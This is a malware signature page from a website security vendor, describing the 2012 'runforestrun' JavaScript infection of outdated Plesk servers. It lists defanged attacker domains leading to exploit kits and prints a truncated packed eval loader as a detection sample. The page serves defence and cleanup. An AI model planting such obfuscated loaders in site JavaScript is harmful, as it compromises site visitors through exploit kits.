Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.runforest

Description: Our scanners identified a packed (encoded) javascript block related to the "runforestrun" malware botnet that has been compromising Plesk-powered servers.

This is a very common malware infecting thousands of sites (Jul 2012). Some of the domains being used:

*.qxpmhnrvrkqewurq.waw[.]pl
*.keefqnfsgqxrzlru.waw[.]pl
*.ekkugeunekaxqolz.waw[.]pl
*.svndeqsqughepaye.waw[.]pl
.. more random domains ..


Those links lead to multiple exploit kits affecting desktop (Windows) users. Additional details here: http://blog.unmaskparasites.com/2012/07/26/runforestrun-now-encrypts-legitimate-js-files/.



Affecting: Sites with Plesk outdated.

Clean up: Malware is hidden at the javascript files.

Malware dump:
eval (function(p,a,c, k,e,r){e=function(c){return(c<a?"':e(parseInt(c/a)))+((c=c%a)>
35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return..

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb